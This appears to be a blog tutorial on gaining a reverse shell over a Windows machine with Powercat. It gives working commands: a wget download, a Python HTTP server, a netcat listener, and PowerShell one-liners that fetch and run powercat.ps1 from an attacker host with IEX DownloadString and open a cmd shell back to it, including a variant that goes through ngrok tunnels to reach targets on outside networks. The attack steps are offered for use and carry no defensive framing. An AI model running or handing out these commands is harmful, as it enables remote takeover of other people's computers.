Getting Reverse Shell with Powercat

Image Source: https://github.com/rexpository/powercat-v2.0

Powercat is a PowerShell-based tool that provides the functionality of Netcat, a popular network utility. It can be used to create reverse shells, transfer files, and perform other network-related tasks. Powercat is often used by penetration testers and security researchers to test the security of networks.

Now let’s talk about how to get Reverse Shell from the target computer with Powercat. What I’m about to tell you is so that you can get Reverse Shell from a computer on the same network. If you want to get Reverse Shell from a computer in a remote network, you will need to forward the connection from the remote network to your local using the Ngrok tool, one of the previous articles.

1- Install a Linux server and then download the Powercat script to the server. I prefer Kali Linux

Wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

2- Let’s start an http server with Python. The reason is to make the target system download the powercat.ps1 file from our attacker server.

python -m SimpleHTTPServer 80

3- Let’s start a NetCat listener and start listening to the port we want. Here I choose port 4444.

What the -vlp parameters do;

  • Print verbose output, which includes information about the connection, such as the remote host and port, the local port, and the data that is being transferred.
  • Listen on a local port, which means that Netcat will wait for a connection from another host.
  • Specify the local port to listen on.

4- Make the following command run on the target machine.

PowerShell
powershell -c "IEX (New-ObjectSystem.Net.WebClient).DownloadString('http://<Attacker-Linux-IP>/powercat.ps1');powercat -c 172.16.5.127 -p 4444 -e cmd"

After running the command, we will see that we have the shell when we go to the attacker server.


If you want to do this with a device from the external network, not between two devices in the internal network, you can follow the steps below.

First of all, we need a server that will meet the requests we will send to the external, if not, you can use ngrok. I explained how to install it in my previous article (Forming Backdoor Payload and Obtaining a Reverse Shell Using Ngrok and Metasploit Framework and How to Protect Yourself from it).

Since ngrok gives us only one port, we made another ngrok up to deliver the powercat.ps1 file to the target.

Controller Server’s Ngrok

The Ngrok server where we will distribute the Powercat File

Final Command

PowerShell
powershell -c "IEX (New-Object System.Net.WebClient).DownloadString('http://X.tcp.eu.ngrok.io:XXX/powercat.ps1');powercat -c Y.tcp.eu.ngrok.io -p YYY -e cmd"

You must enter your URL and Port information in the places I put XX and YY.


Posted

in

by

Tags:

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *